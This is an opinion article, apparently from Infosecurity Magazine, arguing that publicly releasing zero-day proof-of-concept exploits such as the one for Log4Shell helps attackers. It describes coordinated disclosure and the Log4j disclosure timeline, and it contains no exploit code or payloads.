Log4j Showed Us That Public Disclosure Still Helps Attackers

Written by

At 2:25 pm on December 9, an infamous (now deleted) tweet linking a zero-day proof of concept exploit for the vulnerability that came to be known as ‘Log4Shell’ on GitHub (also now deleted) set the internet on fire. It also kicked off a holiday season of companies scrambling to mitigate, patch and then patch some more as further proof of concepts appeared on the different iterations of this vulnerability which was present in pretty much everything that used log4j.

Otherwise known as public disclosure, the act of telling the world something is vulnerable with an accompanying proof of concept is not new and happens quite frequently for all sorts of software, from the most esoteric to the mundane. Over time, however, research and experience have consistently shown us that the only benefit to the release of zero-day proof of concepts is threat actors, as it suddenly puts companies in an awkward position of having to mitigate without necessarily having anything to mitigate with (i.e., a vendor patch).

How Does Disclosure Usually Work?

All kinds of disclosure mechanisms exist today, whether companies have a vulnerability disclosure program that’s officially sanctioned (think of Google and Microsoft) or those that are run via crowdsourced platforms that are often referred to as ‘bug bounties.’ Disclosures in these scenarios often go through a specific process and have adequate timelines where the vendor patch is released and given ample time for take-up by the users of the software in question (90 days is the accepted standard here) and the proof of concept only being released publicly with vendor approval (this is also known as ‘co-ordinated disclosure’). Bug bounty platforms also apply NDA’s to their security researchers on top of this so that often the proof of concepts remains sealed even if the vulnerability has long been fixed.

Having gone through many disclosures myself, both through the CVE format or directly through vulnerability disclosure processes, it usually works like this if it goes smoothly:

  • The researcher informs the vendor about vulnerability with accompanying proof of concept
  • The vendor confirms vulnerability and works on a fix with an approximate timeline
  • Once the fix is in place, the vendor asks the researcher to confirm that the fix works
  • After the researcher confirms the fix, the vendor implements the patch
  • After a certain period after the patch is released, details of the vulnerability can be published if the vendor agrees to it (Anything up to 90 days is normal)

Returning to the Log4j vulnerability, there was actually a disclosure process already underway, as evidenced by the pull request on GitHub that appeared on November 30. The actual timeline of the disclosure was slightly different, as evidenced by an e-mail to SearchSecurity:

  • 11/24/2021: informed
  • 11/25/2021: accepted report, CVE reserved, researching fix
  • 11/26/2021: communicated with reporter
  • 11/29/2021: communicated with reporter
  • 12/4/2021: changes committed
  • 12/5/2021: changes committed
  • 12/7/2021: first release candidate
  • 12/8/2021: communicated with reporter, additional fixes, second release candidate
  • 12/9/2021: released

While the comments in the thread indicate frustration with the speed of the fix, this is par for the course when it comes to fixing vulnerabilities (As everyone points out, the patch was built by volunteers after all).

The Reasons for Releasing Zero-Day Proof of Concept and the Evidence Against

On the surface, there may appear to be legitimate reasons for a zero-day proof of concept release. The most common is that the vulnerability disclosure process with the vendor has broken down. This can happen for many reasons, including the vendor not being responsive (i.e., Playing dead), not considering the vulnerability as serious enough to warrant a fix, taking too long to fix it or combining the above. The stance then is to release it for the ‘common good,’ which evidence has shown is rarely for the good of software users. There are also peripheral reasons that are less convincing for releasing a proof of concept, namely publicity, especially if you are linked to a security vendor. Nothing gets press coverage faster than a proof of concept for a common piece of software that everyone uses but has no patch yet. Unfortunately, this is a mainstay of a lot of security research today.

The evidence against releasing proof of concept is now robust and overwhelming. A study completed by Kenna Security on that very topic effectively showed that the only benefit to proof of concept exploits was to the attackers that leveraged them. Even several years ago, a presentation at Black Hat entitled ‘Zero days and thousands of nights’  walked through the lifecycle of zero-days and how they were released and exploited. It showed that if proof of concept exploits were not disclosed publicly, they weren’t discovered on average for seven years by anybody, threat actors included. Sadly this was realized a bit too late during the log4j scramble. While all the initial disclosures were promptly walked back and deleted, even the most recent 2.17.1 disclosure ran into the same trouble – receiving a lot of flak to the point where the researcher issued a public apology for the poor timing of the disclosure.

It’s good to see that attitudes towards public disclosure of proof of concept exploits have shifted, and the criticism of researchers who decide to jump the gun is deserved. Still, collectively, it seems like the work needs to focus on putting in more robust disclosure processes for everyone so that we don’t fall into the trap of repeating this scenario the next time a vulnerability like this rolls around.

What’s hot on Infosecurity Magazine?